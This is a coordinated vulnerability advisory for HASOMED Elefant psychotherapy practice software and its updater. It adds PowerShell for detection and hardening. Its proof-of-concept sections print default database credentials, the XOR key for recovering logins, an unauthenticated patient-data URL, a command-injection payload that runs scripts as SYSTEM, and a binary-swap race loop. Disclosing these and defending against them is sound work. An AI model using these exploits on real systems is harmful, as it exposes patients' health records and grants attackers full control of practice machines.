Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater

Title

Multiple Vulnerabilities

Product

HASOMED Elefant and Elefant Software Updater

Vulnerable Version

Elefant <24.04.00, Elefant Software Updater <1.4.2.1811

Fixed Version

Elefant 24.04.00, Elefant Software Updater 1.4.2.1811

CVE Number

CVE-2024-50588, CVE-2024-50589, CVE-2024-50590, CVE-2024-50591, CVE-2024-50592, CVE-2024-50593

Impact

critical

Found

15.04.2024

By

Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann (Office Bochum) | SEC Consult Vulnerability Lab

Multiple vulnerabilities in the HASOMED Elefant medical software were identified. An unauthenticated attacker on the local network was able to connect to the database in the role of database administrator using default credentials. This allowed the attacker to read or overwrite patient data and the login data required for the Elefant software. In addition, an unprotected FHIR API reachable from the local network allowed patient data to be read. In the default configuration, a local attacker without administrative privileges could abuse the Elefant Windows services to escalate privileges on the local system (Local Privilege Escalation). Several vulnerabilities were also identified in the accompanying Elefant Software Updater, which an attacker could likewise use for local privilege escalation.

Vendor description


(Translated) "Elefant is the KBV-certified practice software from HASOMED, specializing in the needs of psychological psychotherapists, child and adolescent psychotherapists and medical psychotherapists. The software is ideal for individual and group practices, private accountants, medical care centers and training institutes in the fields of behavioral therapy, psychoanalysis, depth-psychology-based psychotherapy and systemic therapy."

Source: https://hasomed.de/produkte/elefant/

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

1) Unprotected Exposed Firebird Database (CVE-2024-50588)

An unauthenticated attacker with access to the local network of the medical office can use known default credentials to gain remote DBA access to the Elefant Firebird database. The data in the database includes patient data and login credentials among other sensitive data. In addition, this enables an attacker to create and overwrite arbitrary files on the server filesystem with the rights of the Firebird database ("NT AUTHORITY\SYSTEM").

2) Unprotected FHIR API (CVE-2024-50589)

An unauthenticated attacker with access to the local network of the medical office can query an unprotected Fast Healthcare Interoperability Resources (FHIR) API to get access to sensitive electronic health records (EHR).

3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)

An attacker with local access to the medical office computer can escalate their Windows user privileges to "NT AUTHORITY\SYSTEM" by overwriting one of two Elefant service binaries that have weak file permissions.

4) Local Privilege Escalation via Command Injection (CVE-2024-50591)

An attacker with local access to the medical office computer can escalate their Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a command injection vulnerability in the Elefant Update Service. The injection is reachable by communicating over Windows named pipes with the Elefant Update Service, which runs as "NT AUTHORITY\SYSTEM".

5) Local Privilege Escalation via Race Condition (CVE-2024-50592)

An attacker with local access to the medical office computer can escalate their Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a race condition in the Elefant Update Service during the repair or update process.

6) Hardcoded Service Password (CVE-2024-50593)

An attacker with local access to the medical office computer can access restricted functions of the Elefant Service tool by using a hard-coded "Hotline" password. 

Proof of concept

1) Unprotected Exposed Firebird Database (CVE-2024-50588)

Elefant uses a Firebird DB to store data. The Firebird server listens on all interfaces on port 3050 (see figure 1):

Figure 1: Database server listening on all interfaces on port 3050

An attacker who can reach port 3050 of the Elefant server can connect directly to the database as DBA using the well-known Firebird default credentials "SYSDBA:masterkey" and the Elefant database path "C:\Elefant1\ELEFANT.gdb", see figure 2:

Figure 2: Direct connection to the database

The database contains all Elefant data including patient data and the obfuscated Elefant login data (figure 3):

Figure 3: Database with sensitive data

To obtain the plaintext login credentials, each byte must be XORed with 0x1b. In addition, an attacker can create and overwrite arbitrary files on the server filesystem with the rights of the database process ("NT AUTHORITY\SYSTEM") via Firebird delta files. Depending on other software running on the server (e.g. Microsoft IIS), remote code execution can be achieved this way by writing a webshell. The weak default credentials are hardcoded into Elefant and Elefant Service, so they cannot simply be changed by the practice without breaking the client.
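The following PowerShell is an added example and is not part of the SEC Consult advisory or of HASOMED's software. It performs three checks an assessor or administrator would want after reading finding 1: whether the Firebird listener on TCP/3050 is bound to every interface rather than to loopback, whether an enabled inbound Windows Firewall rule admits that port from any remote address, and recovery of login data stored with the XOR-0x1b obfuscation described above. Only the port number and the XOR key come from the advisory; the sample bytes are constructed for this example, and the firewall function can be pointed at port 9090 (finding 2) as well.

```powershell
# Added example, not part of the advisory or of HASOMED's software.
# Run elevated so that process paths of SYSTEM-owned listeners are visible.

function Get-ExposedListener {
    param([Parameter(Mandatory)][int]$Port)
    # A listener bound to 0.0.0.0 or :: accepts connections from the whole network,
    # not only from the local machine.
    Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Port          = $_.LocalPort
                LocalAddress  = $_.LocalAddress
                AllInterfaces = $_.LocalAddress -in @('0.0.0.0', '::')
                Process       = $proc.ProcessName
                ImagePath     = $proc.Path
            }
        }
}

function Get-PermissiveInboundRule {
    param([Parameter(Mandatory)][int]$Port)
    # Enabled inbound allow rules for this TCP port whose remote scope is 'Any'.
    # Rules whose LocalPort is 'Any' are not matched by this filter and need a
    # separate look.
    Get-NetFirewallPortFilter -Protocol TCP -LocalPort "$Port" |
        Get-NetFirewallRule |
        Where-Object {
            "$($_.Enabled)" -eq 'True' -and "$($_.Direction)" -eq 'Inbound' -and "$($_.Action)" -eq 'Allow'
        } |
        ForEach-Object {
            $remote = ($_ | Get-NetFirewallAddressFilter).RemoteAddress
            if ($remote -contains 'Any') {
                [pscustomobject]@{
                    Rule          = $_.DisplayName
                    Profile       = "$($_.Profile)"
                    RemoteAddress = ($remote -join ',')
                }
            }
        }
}

function ConvertFrom-ElefantObfuscation {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    # Each stored byte is XORed with 0x1b; XORing with the same key restores it.
    $plain = foreach ($b in $Bytes) { [byte]($b -bxor 0x1b) }
    [System.Text.Encoding]::ASCII.GetString([byte[]]$plain)
}

Get-ExposedListener -Port 3050 | Format-Table -AutoSize
Get-PermissiveInboundRule -Port 3050 | Format-Table -AutoSize

# Constructed sample: the string 'masterkey' obfuscated with the same XOR, then recovered.
$sample = [byte[]]([System.Text.Encoding]::ASCII.GetBytes('masterkey') |
    ForEach-Object { [byte]($_ -bxor 0x1b) })
ConvertFrom-ElefantObfuscation -Bytes $sample
```

A listener reported with AllInterfaces set to True together with at least one rule from Get-PermissiveInboundRule reproduces the exposure described in finding 1. Since the credentials are hardcoded in the client, restricting the firewall rule to the addresses of the practice workstations is the only mitigation available before the vendor patch.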

2) Unprotected FHIR API (CVE-2024-50589)

While the Elefant client is running it listens on port 9090 on all interfaces (figure 4):

Figure 4: Unprotected API access on port 9090

An unauthenticated FHIR API is exposed on this port. An attacker with access to port 9090 can query the API for patient and physician data among other data. The API can be queried via plain HTTP. All patient data can for example be queried by visiting the following URL:

http://XXX.XXX.XXX.XXX:9090/Patient

The API responds with the patient data:

<?xml version="1.0"?>
<Bundle xmlns="http://hl7.org/fhir">
[...]
 <type value="searchset"/>
 <timestamp value="2024-05-08T20:38:26.859+02:00"/>
 <total value="4"/>
[...]
    <Patient>
       <id value="patient.3"/>
       <meta>
         <versionId value="1"/>
         <lastUpdated value="2024-05-31T14:42:39.685+02:00"/>
         <profile value="https://fhir.kbv.de/StructureDefinition/KBV_PR_VoS_Patient|2.1.0"/>
       </meta>
       <identifier>
         <type>
           <coding>
             <system value="http://terminology.hl7.org/CodeSystem/v2-0203"/>
             <code value="MR"/>
           </coding>
         </type>
         <system value="http://hasomed.de/Elefant/Patient"/>
         <value value="3"/>
       </identifier>
       <identifier>
         <use value="official"/>
         <type>
           <coding>
             <system value="http://fhir.de/CodeSystem/identifier-type-de-basis"/>
             <code value="PKV"/>
           </coding>
         </type>
         <system value="http://fhir.de/sid/pkv/kvid-10"/>
         <value value="aaaaa"/>
       </identifier>
       <name>
         <use value="official"/>
         <text value="Dr. POC Vorname POC Nachname"/>
         <family value="POC Nachname">
           <extension url="http://hl7.org/fhir/StructureDefinition/humanname-own-name">
             <valueString value="POC Nachname"/>
           </extension>
         </family>
         <given value="POC Vorname"/>
         <prefix value="Dr.">
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-EN-qualifier">
             <valueCode value="AC"/>
           </extension>
         </prefix>
       </name>
       <gender value="female"/>
       <birthDate value="2018-11-07"/>
       <address>
         <type value="both"/>
         <line value="Teststr. 1">
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-streetName">
             <valueString value="Teststr."/>
           </extension>
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-houseNumber">
             <valueString value="1"/>
           </extension>
         </line>
         <city value="Bochum"/>
         <postalCode value="44801"/>
         <country value="D"/>
       </address>
     </Patient>
[...]

Similarly all practitioner information is available at:

http://XXX.XXX.XXX.XXX:9090/Practitioner/
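The PowerShell below is an added example, not code from the advisory or from HASOMED. It shows how to establish the extent of the exposure in finding 2 without dumping patient records to the console: it parses a FHIR Bundle (namespaced XML, so XPath needs a prefix) into a summary of patient identifiers, and probes the /Patient and /Practitioner paths of a target for an unauthenticated Bundle. Only the port and the two resource paths come from the advisory. The target address 192.0.2.10 is a placeholder, and the inline bundle is a constructed, trimmed copy of the response structure shown above.

```powershell
# Added example, not part of the advisory or of HASOMED's software.

function Get-FhirPatientSummary {
    param([Parameter(Mandatory)][xml]$Bundle)
    # FHIR XML lives in the http://hl7.org/fhir namespace; XPath needs a prefix for it.
    $ns = New-Object System.Xml.XmlNamespaceManager($Bundle.NameTable)
    $ns.AddNamespace('f', 'http://hl7.org/fhir')

    $total = $Bundle.SelectSingleNode('/f:Bundle/f:total/@value', $ns).Value
    $patients = foreach ($p in $Bundle.SelectNodes('//f:Patient', $ns)) {
        [pscustomobject]@{
            Id          = $p.SelectSingleNode('f:id/@value', $ns).Value
            Name        = $p.SelectSingleNode('f:name/f:text/@value', $ns).Value
            BirthDate   = $p.SelectSingleNode('f:birthDate/@value', $ns).Value
            # The health-insurance number (GKV or PKV) is the identifier whose system is under fhir.de
            InsuranceId = $p.SelectSingleNode(
                "f:identifier[starts-with(f:system/@value,'http://fhir.de/sid/')]/f:value/@value", $ns).Value
            City        = $p.SelectSingleNode('f:address/f:city/@value', $ns).Value
        }
    }
    [pscustomobject]@{ Total = [int]$total; Patients = @($patients) }
}

function Invoke-FhirExposureCheck {
    param([Parameter(Mandatory)][string]$Target, [int]$Port = 9090)
    foreach ($resource in 'Patient', 'Practitioner') {
        $uri = "http://${Target}:$Port/$resource"
        try {
            # No credentials and no token are sent: if a Bundle comes back, the API is open.
            $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -TimeoutSec 5
            $doc  = [xml]$resp.Content
            $ns   = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
            $ns.AddNamespace('f', 'http://hl7.org/fhir')
            $count = $doc.SelectSingleNode('/f:Bundle/f:total/@value', $ns).Value
            "$uri : HTTP $($resp.StatusCode), $count $resource record(s) readable without authentication"
        } catch {
            "$uri : not readable ($($_.Exception.Message))"
        }
    }
}

# Constructed sample bundle mirroring the response shown in the advisory (one patient).
$sampleBundle = [xml]@'
<?xml version="1.0"?>
<Bundle xmlns="http://hl7.org/fhir">
  <type value="searchset"/>
  <total value="1"/>
  <entry>
    <resource>
      <Patient>
        <id value="patient.3"/>
        <identifier>
          <system value="http://fhir.de/sid/pkv/kvid-10"/>
          <value value="aaaaa"/>
        </identifier>
        <name><text value="Dr. POC Vorname POC Nachname"/></name>
        <birthDate value="2018-11-07"/>
        <address><city value="Bochum"/></address>
      </Patient>
    </resource>
  </entry>
</Bundle>
'@

(Get-FhirPatientSummary -Bundle $sampleBundle).Patients | Format-Table -AutoSize

# Against a live Elefant client (placeholder address):
# Invoke-FhirExposureCheck -Target 192.0.2.10
```

The summary deliberately keeps only identifiers, name, birth date and city, which is enough to demonstrate the exposure to a practice owner while limiting how much health data an assessment report or console log retains.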

3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)

The default installation directory of Elefant is "C:\Elefant1", which is writable for all users. In addition, the Elefant installer registers two Firebird database services which run as "NT AUTHORITY\SYSTEM" (see figure 5):

Figure 5: Service binary paths

Both service binaries are user writable. This means that a local attacker can rename one of the service binaries, replace the service executable with a new executable, and then restart the system. Once the system has rebooted, the new service binary is executed as "NT AUTHORITY\SYSTEM".
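The following PowerShell is an added example (not from the advisory or from HASOMED) that generalizes finding 3 into a check an administrator can run on any Windows host: it enumerates every service, resolves its executable, and reports binaries, or parent directories, whose ACL grants write-type rights to non-administrative principals. Principals are matched by SID rather than name so the check also works on German-language installations. It also tests the advisory's claim that C:\Elefant1 is world-writable. The remediation function resets the ACL of a reported path with icacls; the path is taken from the detection output, since the advisory does not reproduce the binary names shown in figure 5.

```powershell
# Added example, not part of the advisory or of HASOMED's software.

# Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE: anyone with these can
# replace a service binary if the ACL grants them write-type rights.
$weakSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
# Any of these rights allows replacing or appending to a file, or creating files in a directory.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceExecutablePath {
    param([string]$PathName)
    # Image paths may be quoted or carry arguments: "C:\x\svc.exe" -foo  or  C:\x\svc.exe -foo
    if (-not $PathName) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    if ($p -match '^(\S+\.exe)') { return $Matches[1] }
    return ($p -split ' ')[0]
}

function Get-AceSid {
    param($Ace)
    # Translate the account name to a SID; orphaned or unresolvable accounts return $null.
    try { $Ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
}

function Test-WeakAcl {
    param([Parameter(Mandatory)][string]$Path)
    # Returns one "principal: rights" line per ACE that lets a low-privileged user write.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $weakSids -contains (Get-AceSid $_) -and
        (([int]$_.FileSystemRights -band [int]$writeMask) -ne 0)
    } | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }
}

function Get-WeakServiceBinary {
    Get-CimInstance Win32_Service | ForEach-Object {
        $exe = Get-ServiceExecutablePath $_.PathName
        # Unqualified paths (e.g. system32\svchost.exe) are skipped rather than guessed.
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
        $dir      = Split-Path -LiteralPath $exe -Parent
        $weakFile = @(Test-WeakAcl $exe)
        $weakDir  = @(Test-WeakAcl $dir)
        if ($weakFile.Count -or $weakDir.Count) {
            [pscustomobject]@{
                Service        = $_.Name
                RunsAs         = $_.StartName
                Executable     = $exe
                FileWritableBy = ($weakFile -join '; ')
                DirWritableBy  = ($weakDir -join '; ')
            }
        }
    }
}

function Repair-ServiceBinaryAcl {
    param([Parameter(Mandatory)][string]$Path)
    # Drop inherited ACEs and leave SYSTEM and Administrators as the only principals
    # allowed to modify; everyone else may only read and execute. Run elevated.
    icacls "$Path" /inheritance:r /grant:r 'SYSTEM:(F)' 'Administrators:(F)' 'Users:(RX)'
}

Get-WeakServiceBinary | Format-Table -AutoSize
# The advisory states the installation folder itself is writable for all users:
Test-WeakAcl -Path 'C:\Elefant1'
```

A service that runs as LocalSystem and appears in the output with a non-empty FileWritableBy column is the exact condition exploited above; a non-empty DirWritableBy column alone is still relevant, because a user who can delete and recreate files in the directory can swap the binary even when the file's own ACL is tight.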

4) Local Privilege Escalation via Command Injection (CVE-2024-50591)

The Elefant Software Updater (ESU) consists of two components. An ESU service which runs as "NT AUTHORITY\SYSTEM" and an ESU tray client which communicates with the service to update or repair the installation and is running with user permissions. The communication is implemented using named pipes. A crafted message of type "MessageType.SupportServiceInfos" can be sent to the local ESU service to inject commands, which are then executed as "NT AUTHORITY\SYSTEM".

The following part of the service is vulnerable to command injection because the input is passed on without filtering (figure 6):

Figure 6: Command injection

The input is first split at ';', then used to create a directory, and finally reaches the sink at line 30 of figure 6. Because the input is split at ';', and because the directory creation must succeed before the sink is reached, '&' is the only usable command separator: Windows does not allow the characters \/:*?"<>| in directory or file names, so a payload must avoid those characters as well as ';'. The following payload satisfies these constraints and constructs the path of the target script (C:\SEC\exec.ps1) dynamically, avoiding the ':' and '\' a literal path would require:

"& powershell.exe -NoExit -ep bypass powershell (Join-Path (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #"

For this proof of concept, the ESU tray client "Info" function was modified to inject commands into the ESU service. The payload must be injected into the first parameter of "CollectServiceInfos" to successfully reach the sink in the ESU service after being sent via a named pipe:

private void OnInfo(object sender, EventArgs e)
{
    // Location of the attacker-controlled script that the injected command will run
    string text = "C:\\SEC\\exec.ps1";
    TrayUtils.ShowMessageBox(new MessageBoxData
    {
        Message = "MOD: Put PS Script at " + text,
        Caption = "Info",
        ButtonType = MessageBoxButtons.OK,
        IconType = MessageBoxIcon.Asterisk
    });
    // The first parameter reaches the command-injection sink in the ESU service.
    // '&' ends the intended command; the trailing '#' makes the spawned PowerShell
    // ignore the remainder of the original command line.
    this.m_TrayManager.CollectServiceInfos(
        "& powershell.exe -NoExit -ep bypass powershell (Join-Path (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #",
        "dummy.zip");
}

In this proof of concept the client injects the payload and the ESU service executes the PowerShell script at the user-writable location C:\SEC\exec.ps1. The content of the script is shown below:

whoami > C:\secwashere

After the OK button is pressed, the command is injected and executed as "NT AUTHORITY\SYSTEM" (figure 9):

Figure 9: Executing commands as NT AUTHORITY\SYSTEM
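The advisory shows the vulnerable service method only as a decompiler screenshot (figure 6), so the PowerShell below is an added example, not HASOMED's code: it models the flow the text describes (split at ';', create a directory, concatenate into one command line for cmd.exe) and places a hardened version beside it. The security point is that Windows' reserved-character set is a denylist that was never meant to be a shell filter: '&', '^', '%' and spaces are all legal in file names and all mean something to cmd.exe. The fix is an allowlist plus invoking the tool directly with discrete arguments. collect.exe, the function names and the use of the temp directory are placeholders.

```powershell
# Added example, not part of the advisory or of HASOMED's software.

function Invoke-CollectInfosVulnerable {
    param([string]$Target, [string]$ZipName)
    # Mirrors the described flow. Only the reserved characters \/:*?"<>| stop the
    # directory creation, and '&' is not among them: the directory is created and
    # cmd.exe then sees everything after '&' as a second command.
    $dir = ($Target -split ';')[0]
    New-Item -ItemType Directory -Path (Join-Path $env:TEMP $dir) -Force | Out-Null
    cmd.exe /c "collect.exe $env:TEMP\$dir $ZipName"
}

function Test-SafeFileName {
    param([string]$Name)
    # Allowlist instead of denylist: letters, digits, '.', '_' and '-', no leading
    # dot, bounded length, and none of the reserved device names.
    if ($Name -notmatch '^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$') { return $false }
    if ($Name -match '^(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\..*)?$') { return $false }
    return $true
}

function Invoke-CollectInfosHardened {
    param([string]$Target, [string]$ZipName)
    if (-not (Test-SafeFileName $Target))  { throw "rejected directory name: '$Target'" }
    if (-not (Test-SafeFileName $ZipName)) { throw "rejected archive name: '$ZipName'" }
    $dir = New-Item -ItemType Directory -Path (Join-Path $env:TEMP $Target) -Force
    # Invoke the tool directly with separate arguments: no cmd.exe and no string
    # concatenation, so a separator character never reaches a shell parser.
    & "$PSScriptRoot\collect.exe" $dir.FullName $ZipName
}

# The payload from the proof of concept above, run through the allowlist.
$payload = '& powershell.exe -NoExit -ep bypass powershell (Join-Path (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #'
Test-SafeFileName 'dummy.zip'
Test-SafeFileName $payload
```

'dummy.zip' passes the allowlist; the payload is rejected on its first character. Note that the hardened version would still have to be applied on the service side of the named pipe, not in the tray client, since the client is attacker-controlled (it was simply modified for this proof of concept).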

5) Local Privilege Escalation via Race Condition (CVE-2024-50592)

Another way to escalate local privileges is to use the Elefant Software Updater "repair" function. When using the repair function, the service queries the server for a list of files and their hashes. In addition, instructions to execute binaries to finalize the repair process are included:

POST /eup/release/prod/backend/api/ReadApplicationVersion HTTP/2
Host: eup.hasomed.de
Accept: application/json
Apikey: fb[...]
Content-Type: application/json; charset=utf-8
Content-Length: 242
{"programName":"elefant"
[...]

The server responds with:

HTTP/2 200 OK
[...]
"hash":"","fileSize":0,"type":"execute","filePath":"PostESUUpdate.exe",
"parameters":"","hint":"Abschließende Schritte nach der Installation des Elefant-Updates
durch den ESU"},{"hash":"","fileSize":0,"type":"execute","filePath":"Support\\Update_OpenJava.exe"
,"parameters":"/verysilent","hint":"Aktualisierung der OpenJava-Instanz"}]}

The executables are executed as "NT AUTHORITY\SYSTEM" after they are copied over to the user-writable installation folder (C:\Elefant1). This means that a user can overwrite either "PostESUUpdate.exe" or "Update_OpenJava.exe" in the time frame after the copy and before the execution of the final repair step. The overwritten executable is then executed as "NT AUTHORITY\SYSTEM".

The following steps can be performed to reliably execute the local privilege escalation using PostESUUpdate.exe:

  1. Delete PostESUUpdate.exe in C:\Elefant1 before starting the repair function.
  2. Start repair function in ESU
  3. Continuously check if PostESUUpdate.exe has been copied over to C:\Elefant1 yet
  4. Immediately overwrite the executable and wait for the execution as "NT AUTHORITY\SYSTEM"

The following PowerShell script can be used to perform steps 3 and 4. It must be run from C:\Elefant1, because both file names are relative to the current directory; exec.exe is the attacker's replacement binary:

# Delete PostESUUpdate.exe in C:\Elefant1 before starting the update/repair.
# Busy-wait until the service has copied the file in, then overwrite it at once.
While($true)
{
    If(Test-Path -Path "PostESUUpdate.exe" -PathType Leaf){
        Copy-Item -Force -Path "exec.exe" -Destination "PostESUUpdate.exe"
    }
}
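As an added example, not code from the advisory or from HASOMED, the PowerShell below shows the staging pattern an updater needs so that the race above has no window: copy the binary into a directory only SYSTEM and Administrators can write, hash and signature-check the copy that will actually run (not the original, which the user can still change), and refuse to execute when the manifest carries no reference hash. The server response shown above has "hash":"" for both execute entries, so a verifier built this way would refuse them until the manifest is fixed. The staging directory under ProgramData and the function name are assumptions; the two manifest entries are taken from the response above.

```powershell
# Added example, not part of the advisory or of HASOMED's software. Run as SYSTEM
# or an administrator; the staging directory must not be writable by users.

function Invoke-StagedExecutable {
    param(
        [Parameter(Mandatory)][string]$SourcePath,                        # file in the user-writable install folder
        [Parameter(Mandatory)][AllowEmptyString()][string]$ExpectedSha256, # from the trusted release manifest
        [string[]]$Arguments = @()
    )
    if ([string]::IsNullOrWhiteSpace($ExpectedSha256)) {
        throw "no reference hash for '$SourcePath' in the manifest; refusing to execute"
    }

    # Stage into a directory whose ACL only SYSTEM and Administrators may write.
    $stageDir = Join-Path $env:ProgramData 'ESU\stage'
    if (-not (Test-Path -LiteralPath $stageDir)) {
        New-Item -ItemType Directory -Path $stageDir -Force | Out-Null
        # Drop inherited ACEs (ProgramData lets users create files) and lock it down.
        icacls $stageDir /inheritance:r /grant:r 'SYSTEM:(OI)(CI)F' 'Administrators:(OI)(CI)F' | Out-Null
    }
    $staged = Join-Path $stageDir (Split-Path -Path $SourcePath -Leaf)
    Copy-Item -LiteralPath $SourcePath -Destination $staged -Force

    # Verify the copy we are about to run. Checking the source and then copying
    # would reintroduce the time-of-check/time-of-use window.
    $actual = (Get-FileHash -LiteralPath $staged -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256.ToUpperInvariant()) {
        Remove-Item -LiteralPath $staged -Force
        throw "hash mismatch for '$staged': manifest $ExpectedSha256, file $actual"
    }
    $sig = Get-AuthenticodeSignature -LiteralPath $staged
    if ($sig.Status -ne 'Valid') {
        Remove-Item -LiteralPath $staged -Force
        throw "'$staged' is not validly signed ($($sig.Status))"
    }

    $sp = @{ FilePath = $staged; Wait = $true; NoNewWindow = $true }
    if ($Arguments.Count -gt 0) { $sp.ArgumentList = $Arguments }   # -ArgumentList rejects an empty array
    Start-Process @sp
}

# The two execute entries from the ReadApplicationVersion response above, both with an empty hash.
$manifest = @(
    @{ filePath = 'PostESUUpdate.exe';           parameters = '';            hash = '' },
    @{ filePath = 'Support\Update_OpenJava.exe'; parameters = '/verysilent'; hash = '' }
)
foreach ($entry in $manifest) {
    $params = if ($entry.parameters) { @($entry.parameters) } else { @() }
    try {
        Invoke-StagedExecutable -SourcePath (Join-Path 'C:\Elefant1' $entry.filePath) `
                                -ExpectedSha256 $entry.hash -Arguments $params
    } catch {
        Write-Warning $_.Exception.Message
    }
}
```

Both loop iterations end in the first throw, which is the desired behaviour for the manifest as served: an updater that executes whatever sits in a user-writable folder on the strength of an empty hash field has no integrity check at all, regardless of how quickly it runs the binary after copying it.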

6) Hardcoded Service Password (CVE-2024-50593)

To use certain restricted functions in the Elefant Service Software it is required to enter a hotline password.

Figure 10: Hardcoded hotline password

This password is hardcoded into the Elefant Service binary, which is shipped with the software:

Figure 11: Hardcoded password shipped with the software

Vulnerable / tested versions

The following versions have been tested, which were the latest versions available at the time of the test:

  • Elefant 24.02.02
  • Elefant Software Updater 1.2.0.33679
  • Elefant Service 05.02.00

Vendor contact timeline

2024-07-01 Contacting vendor through security@hasomed.de.
2024-07-04 First vendor response. Security contact has time off and will reply on 07-15.
2024-07-12 Security contact is back and requests the advisory.
2024-07-15 Sending advisory to vendor contact.
2024-07-18 Security contact informs us that patches for part of the issues are planned for CW32; due to vacation and regulatory issues the other issues can only be fixed after CW42, and therefore requests an extension of the deadline to CW42. We extend the deadline to CW42.
2024-07-29 Security contact informs us that the first three fixes have been implemented in Version 24.03.03. According to the changelog, the update contains fixes for findings 1 and 6.
2024-09-04 Security contact informs us that all development is progressing as planned and the new release will be ready in CW 42.
2024-10-16 Security contact sends new release notes for version 24.04.00. According to the changelog and security contact, the update contains fixes for finding 2 and 3.
2024-10-23 Security contact informs us that the update 1.4.2.1811 of the Elefant Software Updater contains fixes for findings 4 and 5, and that adjustments for the FHIR API were made in version 24.04.00.
2024-10-28 Sending vendor latest advisory draft, informing about release on 31st October.
2024-10-30 Vendor thanks us for the CVE assignment; no further feedback except that the first updates for the Software Updater have already been available since 2024-08-21.
2024-11-05 Informing vendor about delay, postponed to 7th November.
2024-11-07 Coordinated release of advisory.

Solution

The vendor provides a patched version 24.04.00 (or higher) which can be downloaded from hasomed.de/produkte/elefant/ or via the Elefant Software Updater.

This patched version also includes the fixes for the Elefant Software Updater, which were shipped in version 1.4.2.1811 of the updater.

Workaround

Workarounds such as restricting the Elefant Windows Firewall rules (findings 1 and 2) and manually tightening the file permissions of the installation folder and service binaries (findings 3 and 5) are feasible for some of the vulnerabilities, but they do not address the hardcoded credentials or the command injection; installing the patches provided by the vendor is recommended.

Advisory URL

https://sec-consult.com/vulnerability-lab/


EOF Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann / @2024
